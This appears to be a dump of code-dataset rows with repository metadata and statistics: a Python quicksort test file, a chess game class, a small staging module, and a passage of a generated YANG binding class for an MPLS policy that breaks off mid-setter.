| 422 | 1,657 | 0.985782 | 8 | 1,688 | 208 | 0.625 | 0.014423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101604 | 0.002962 | 1,688 | 3 | 1,658 | 562.666667 | 0.887106 | 0 | 0 | 0 | 0 | 0 | 0.975711 | 0.966825 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2387274cdcf382081f55ecf735fbdb59bbf19cf1 | 1,292 | py | Python | python/tests/test_quick_sort.py | kylehoac/data-structures-and-algorithms | 52326ffcf27b5cc27863a96db86ece585f3d5e33 | [
"MIT"
] | null | null | null | python/tests/test_quick_sort.py | kylehoac/data-structures-and-algorithms | 52326ffcf27b5cc27863a96db86ece585f3d5e33 | [
"MIT"
] | 7 | 2021-04-15T23:51:52.000Z | 2021-04-26T17:18:16.000Z | python/tests/test_quick_sort.py | kylehoac/data-structures-and-algorithms | 52326ffcf27b5cc27863a96db86ece585f3d5e33 | [
"MIT"
] | null | null | null | from code_challenges.quick_sort.quick_sort import quick_sort, partition,swap
def test_assert_quick_sort():
assert quick_sort
def test_quick_sort():
list = [8,4,23,42,16,15]
actual = quick_sort(list, 0, len(list)-1)
expected = [4,8,15,16,23,42]
assert actual == expected
def test_quick_sort_with_negatives():
list = [-8,4,23,42,16,15]
actual = quick_sort(list, 0, len(list)-1)
expected = [-8,4,15,16,23,42]
assert actual == expected
def test_quick_sort_with_floats():
list = [8,4,23,42,15.5,15.6,60]
actual = quick_sort(list, 0, len(list)-1)
expected = [4,8,15.5,15.6,23,42,60]
assert actual == expected
def test_quick_sort_odd_num_of_nums():
list = [8,4,23,42,16,15,60]
actual = quick_sort(list, 0, len(list)-1)
expected = [4,8,15,16,23,42,60]
assert actual == expected
def test_quick_sort_with_one_value():
list = [8]
actual = quick_sort(list, 0, len(list)-1)
expected = [8]
assert actual == expected
def test_quick_sort_empty_list():
list = []
actual = quick_sort(list, 0, len(list)-1)
expected = []
assert actual == expected
def test_quick_sort_empty_list():
list = [4,3,2,1]
actual = quick_sort(list, 0, len(list)-1)
expected = [4,3,2,1]
assert actual != expected
| 27.489362 | 76 | 0.653251 | 220 | 1,292 | 3.636364 | 0.172727 | 0.21375 | 0.13 | 0.14 | 0.75625 | 0.74375 | 0.74375 | 0.72625 | 0.72125 | 0.67625 | 0 | 0.111538 | 0.195046 | 1,292 | 46 | 77 | 28.086957 | 0.657692 | 0 | 0 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.236842 | 1 | 0.210526 | false | 0 | 0.026316 | 0 | 0.236842 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f1d5b51891a0466a3fc9d251259880f0b5c5923a | 17,100 | py | Python | game.py | alexsofluffy/chess-game | f297357b1b933e7009677a568b2636ace9c205d9 | [
"MIT"
] | 2 | 2020-05-05T00:52:53.000Z | 2020-05-05T00:53:08.000Z | game.py | alexsofluffy/chess-game | f297357b1b933e7009677a568b2636ace9c205d9 | [
"MIT"
] | null | null | null | game.py | alexsofluffy/chess-game | f297357b1b933e7009677a568b2636ace9c205d9 | [
"MIT"
] | null | null | null | from board import Board
from piece import Pawn, Rook, Queen, King
class Chess:
"""Represents a game of chess."""
def __init__(self):
self.game_board = Board()
self.board = self.game_board.board
self.turn = 'w'
self.state = 'UNFINISHED'
self.turn_count = 1
def is_in_check(self, player):
"""Checks whether or not the specified player is in check."""
if player == 'w':
for row in range(8):
for col in range(8):
piece = self.board[row][col]
if isinstance(piece, King) is True and piece.color == 'w':
king_pos = [row, col]
for row2 in range(8):
for col2 in range(8):
piece = self.board[row2][col2]
if piece != '_' and piece.color == 'b':
if piece.is_move_valid(king_pos[0],
king_pos[1],
self.board) is True:
return True
return False
if player == 'b':
for row in range(8):
for col in range(8):
piece = self.board[row][col]
if isinstance(piece, King) is True and piece.color == 'b':
king_pos = [row, col]
for row2 in range(8):
for col2 in range(8):
piece = self.board[row2][col2]
if piece != '_' and piece.color == 'w':
if piece.is_move_valid(king_pos[0],
king_pos[1],
self.board) is True:
return True
return False
def is_in_mate(self, player):
"""Checks whether the specified player is in checkmate or stalemate."""
if player == 'w':
for row in range(8):
for col in range(8):
piece = self.board[row][col]
if piece != '_' and piece.color == 'w':
for row2 in range(8):
for col2 in range(8):
taken_piece = self.board[row2][col2]
if taken_piece == '_' or \
taken_piece.color == 'b':
if piece.is_move_valid(row2, col2,
self.board) is True:
self.board[row2][col2] = piece
self.board[row][col] = '_'
piece.row = row2
piece.col = col2
if isinstance(piece, King) is True and\
piece.moved is False:
if (row2 == 7 and col2 == 2) or \
(row2 == 7 and col2 == 6):
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
if self.is_in_check('w') is False:
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
else:
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return True
if player == 'b':
for row in range(8):
for col in range(8):
piece = self.board[row][col]
if piece != '_' and piece.color == 'b':
for row2 in range(8):
for col2 in range(8):
taken_piece = self.board[row2][col2]
if taken_piece == '_' or \
taken_piece.color == 'w':
if piece.is_move_valid(row2, col2,
self.board) is True:
self.board[row2][col2] = piece
self.board[row][col] = '_'
piece.row = row2
piece.col = col2
if isinstance(piece, King) is True and\
piece.moved is False:
if (row2 == 0 and col2 == 2) or \
(row2 == 0 and col2 == 6):
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
if self.is_in_check('b') is False:
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
else:
self.board[row2][col2] = \
taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return True
def move(self, row, col, new_row, new_col):
"""Moves specified piece to the specified location on board if valid.
Keyword arguments:
row -- the row on the game board that piece is located
col -- the column on the game board that piece is located
new_row -- the row on the game board that piece is trying to move to
new_col -- the column on the game board that piece is trying to move to
"""
# Returns False if game is already finished.
if self.state != 'UNFINISHED':
return False
# Returns False if the arguments passed are out of range.
if row not in range(8) or col not in range(8) or \
new_row not in range(8) or new_col not in range(8):
return False
# Returns False if starting position contains no piece to move.
if self.board[row][col] == '_':
return False
# Returns False if player tries to move opponent's piece or capture one
# of its own pieces.
if self.turn == 'w':
if self.board[row][col].color == 'b':
return False
if self.board[new_row][new_col] != '_':
if self.board[new_row][new_col].color == 'w':
return False
if self.turn == 'b':
if self.board[row][col].color == 'w':
return False
if self.board[new_row][new_col] != '_':
if self.board[new_row][new_col].color == 'b':
return False
# Returns False if move is invalid per that piece type's rules.
piece = self.board[row][col]
taken_piece = self.board[new_row][new_col]
if piece.is_move_valid(new_row, new_col, self.board) is False:
return False
# Checks if player is trying to castle.
castle = False
if isinstance(piece, King) is True and piece.moved is False:
if self.turn == 'w':
if new_row == 7 and new_col == 2:
if self.is_in_check('w') is True:
return False
self.board[new_row][3] = piece
self.board[row][col] = '_'
piece.row = new_row
piece.col = 3
if self.is_in_check('w') is True:
self.board[new_row][3] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
self.board[new_row][3] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
castle = True
if new_row == 7 and new_col == 6:
if self.is_in_check('w') is True:
return False
self.board[new_row][5] = piece
self.board[row][col] = '_'
piece.row = new_row
piece.col = 5
if self.is_in_check('w') is True:
self.board[new_row][5] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
self.board[new_row][5] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
castle = True
if self.turn == 'b':
if new_row == 0 and new_col == 2:
if self.is_in_check('b') is True:
return False
self.board[new_row][3] = piece
self.board[row][col] = '_'
piece.row = new_row
piece.col = 3
if self.is_in_check('b') is True:
self.board[new_row][3] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
self.board[new_row][3] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
castle = True
if new_row == 0 and new_col == 6:
if self.is_in_check('b') is True:
return False
self.board[new_row][5] = piece
self.board[row][col] = '_'
piece.row = new_row
piece.col = 5
if self.is_in_check('b') is True:
self.board[new_row][5] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
self.board[new_row][5] = '_'
self.board[row][col] = piece
piece.row = row
piece.col = col
castle = True
# Checks if player is trying to perform an "en-passant".
en_passant = False
if isinstance(piece, Pawn) is True:
if piece.en_passant is True:
if self.turn == 'w':
captured_piece = self.board[new_row + 1][new_col]
if captured_piece.turn_moved != self.turn_count - 1:
piece.en_passant = False
return False
else:
en_passant = True
if self.turn == 'b':
captured_piece = self.board[new_row - 1][new_col]
if captured_piece.turn_moved != self.turn_count - 1:
piece.en_passant = False
return False
else:
en_passant = True
# Updates the position of the piece.
self.board[new_row][new_col] = piece
self.board[row][col] = '_'
piece.row = new_row
piece.col = new_col
# Reverses move and returns False if move puts own king in check.
# Updates the is_in_check status of the opponent if move places their
# king in check.
if self.turn == 'w':
if self.is_in_check('w') is True:
self.board[new_row][new_col] = taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
if isinstance(piece, Pawn) is True:
if new_row == 0 or new_row == 7:
self.board[new_row][new_col] = Queen(new_row, new_col, 'w')
if piece.moved_2 is True:
piece.turn_moved = self.turn_count
piece.moved_2 = False
if en_passant is True:
self.board[new_row + 1][new_col] = '_'
piece.en_passant = False
if isinstance(piece, Rook) is True:
if piece.moved is False:
piece.moved = True
if isinstance(piece, King) is True:
if piece.moved is False:
piece.moved = True
if castle is True:
if new_col < col:
rook = self.board[7][0]
self.board[7][3] = rook
self.board[7][0] = '_'
rook.row = 7
rook.col = 3
if new_col > col:
rook = self.board[7][7]
self.board[7][5] = rook
self.board[7][7] = '_'
rook.row = 7
rook.col = 5
if self.is_in_check('b') is True:
if self.is_in_mate('b') is True:
self.state = 'WHITE WON'
else:
if self.is_in_mate('b') is True:
self.state = 'STALEMATE'
if self.turn == 'b':
if self.is_in_check('b') is True:
self.board[new_row][new_col] = taken_piece
self.board[row][col] = piece
piece.row = row
piece.col = col
return False
if isinstance(piece, Pawn) is True:
if new_row == 0 or new_row == 7:
self.board[new_row][new_col] = Queen(new_row, new_col, 'b')
if piece.moved_2 is True:
piece.turn_moved = self.turn_count
piece.moved_2 = False
if en_passant is True:
self.board[new_row - 1][new_col] = '_'
piece.en_passant = False
if isinstance(piece, Rook) is True:
if piece.moved is False:
piece.moved = True
if isinstance(piece, King) is True:
if piece.moved is False:
piece.moved = True
if castle is True:
if new_col < col:
rook = self.board[0][0]
self.board[0][3] = rook
self.board[0][0] = '_'
rook.row = 0
rook.col = 3
if new_col > col:
rook = self.board[0][7]
self.board[0][5] = rook
self.board[0][7] = '_'
rook.row = 0
rook.col = 5
if self.is_in_check('w') is True:
if self.is_in_mate('w') is True:
self.state = 'BLACK WON'
else:
if self.is_in_mate('w') is True:
self.state = 'STALEMATE'
# Updates the turn tracker.
if self.turn == 'w':
self.turn = 'b'
else:
self.turn = 'w'
self.turn_count += 1
return True
| 46.467391 | 79 | 0.37924 | 1,713 | 17,100 | 3.66258 | 0.065382 | 0.124801 | 0.059292 | 0.074115 | 0.853682 | 0.77877 | 0.749442 | 0.730794 | 0.720593 | 0.714217 | 0 | 0.019321 | 0.539942 | 17,100 | 367 | 80 | 46.594005 | 0.778187 | 0.064561 | 0 | 0.807927 | 0 | 0 | 0.00842 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012195 | false | 0.030488 | 0.006098 | 0 | 0.109756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7b20e315857ba907999e2116345343a9f52aa2ba | 194 | py | Python | r2drink2/setup/staging/__init__.py | nilakshdas/bmed8813rob-sp21-team1-r2drink2 | aec632bbfd39760d6600109cb5ec64836f2ff6e5 | [
"MIT"
] | 1 | 2022-02-11T20:39:52.000Z | 2022-02-11T20:39:52.000Z | r2drink2/setup/staging/__init__.py | nilakshdas/bmed8813rob-sp21-team1-r2drink2 | aec632bbfd39760d6600109cb5ec64836f2ff6e5 | [
"MIT"
] | null | null | null | r2drink2/setup/staging/__init__.py | nilakshdas/bmed8813rob-sp21-team1-r2drink2 | aec632bbfd39760d6600109cb5ec64836f2ff6e5 | [
"MIT"
] | null | null | null | from .hydration import setup_hydration_staging
from .table import setup_table
def setup_staging(*args, **kwargs):
setup_table(*args, **kwargs)
setup_hydration_staging(*args, **kwargs)
| 24.25 | 46 | 0.762887 | 25 | 194 | 5.64 | 0.36 | 0.212766 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128866 | 194 | 7 | 47 | 27.714286 | 0.83432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9e7e1347e5e58172609faf1f0acaa080d98c09c5 | 88,780 | py | Python | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class mpls_policy(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-policy/output/mpls-policy. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__policy_cspf_interface_constraint','__policy_cspf_group_computation_mode','__policy_use_bypass_metric','__policy_use_bypass_liberal','__policy_implicite_commit','__policy_label_propagate_ttl','__policy_vrf_propagate_ttl','__policy_propagate_ttl','__policy_rtm_route_filter_enabled','__policy_rtm_route_filter_all_ibgp_enabled','__policy_load_interval','__policy_ingress_tnnl_accounting','__policy_te_policy_ospf','__policy_te_policy_isis','__policy_ospf_area_defined','__policy_ospf_area','__policy_handle_ospf_nbr_dn','__policy_handle_isis_nbr_dn','__policy_lsp_fast_retry_on','__policy_max_lsp_retries','__policy_lsp_retry_interval','__policy_frr_bkup_retry_interval','__policy_auto_bw_enabled','__policy_auto_bw_sample_interval','__policy_soft_preempt_cleanup_timer','__policy_rsvp_periodic_flooding_timer',)
_yang_name = 'mpls-policy'
_rest_name = 'mpls-policy'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__policy_lsp_fast_retry_on = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-lsp-fast-retry-on", rest_name="policy-lsp-fast-retry-on", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_te_policy_ospf = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-ospf", rest_name="policy-te-policy-ospf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_implicite_commit = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-implicite-commit", rest_name="policy-implicite-commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__policy_label_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-label-propagate-ttl", rest_name="policy-label-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_rtm_route_filter_all_ibgp_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-all-ibgp-enabled", rest_name="policy-rtm-route-filter-all-ibgp-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_frr_bkup_retry_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-frr-bkup-retry-interval", rest_name="policy-frr-bkup-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__policy_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-propagate-ttl", rest_name="policy-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_use_bypass_metric = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-metric", rest_name="policy-use-bypass-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_cspf_interface_constraint = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-interface-constraint", rest_name="policy-cspf-interface-constraint", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_max_lsp_retries = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-max-lsp-retries", rest_name="policy-max-lsp-retries", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__policy_lsp_retry_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-lsp-retry-interval", rest_name="policy-lsp-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__policy_cspf_group_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-group-computation-mode", rest_name="policy-cspf-group-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_vrf_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-vrf-propagate-ttl", rest_name="policy-vrf-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_load_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-load-interval", rest_name="policy-load-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__policy_te_policy_isis = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-isis", rest_name="policy-te-policy-isis", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_ospf_area = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-ospf-area", rest_name="policy-ospf-area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__policy_ingress_tnnl_accounting = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ingress-tnnl-accounting", rest_name="policy-ingress-tnnl-accounting", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_auto_bw_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-auto-bw-enabled", rest_name="policy-auto-bw-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_rsvp_periodic_flooding_timer = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-rsvp-periodic-flooding-timer", rest_name="policy-rsvp-periodic-flooding-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__policy_auto_bw_sample_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-auto-bw-sample-interval", rest_name="policy-auto-bw-sample-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__policy_use_bypass_liberal = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-liberal", rest_name="policy-use-bypass-liberal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_handle_isis_nbr_dn = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-isis-nbr-dn", rest_name="policy-handle-isis-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_handle_ospf_nbr_dn = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-ospf-nbr-dn", rest_name="policy-handle-ospf-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_ospf_area_defined = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ospf-area-defined", rest_name="policy-ospf-area-defined", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_rtm_route_filter_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-enabled", rest_name="policy-rtm-route-filter-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
self.__policy_soft_preempt_cleanup_timer = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-soft-preempt-cleanup-timer", rest_name="policy-soft-preempt-cleanup-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-policy', u'output', u'mpls-policy']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-policy', u'output', u'mpls-policy']
def _get_policy_cspf_interface_constraint(self):
"""
Getter method for policy_cspf_interface_constraint, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_cspf_interface_constraint (uint8)
YANG Description: CSPF Interface constraint
"""
return self.__policy_cspf_interface_constraint
def _set_policy_cspf_interface_constraint(self, v, load=False):
"""
Setter method for policy_cspf_interface_constraint, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_cspf_interface_constraint (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_cspf_interface_constraint is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_cspf_interface_constraint() directly.
YANG Description: CSPF Interface constraint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-interface-constraint", rest_name="policy-cspf-interface-constraint", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_cspf_interface_constraint must be of a type compatible with uint8""",
'defined-type': "uint8",
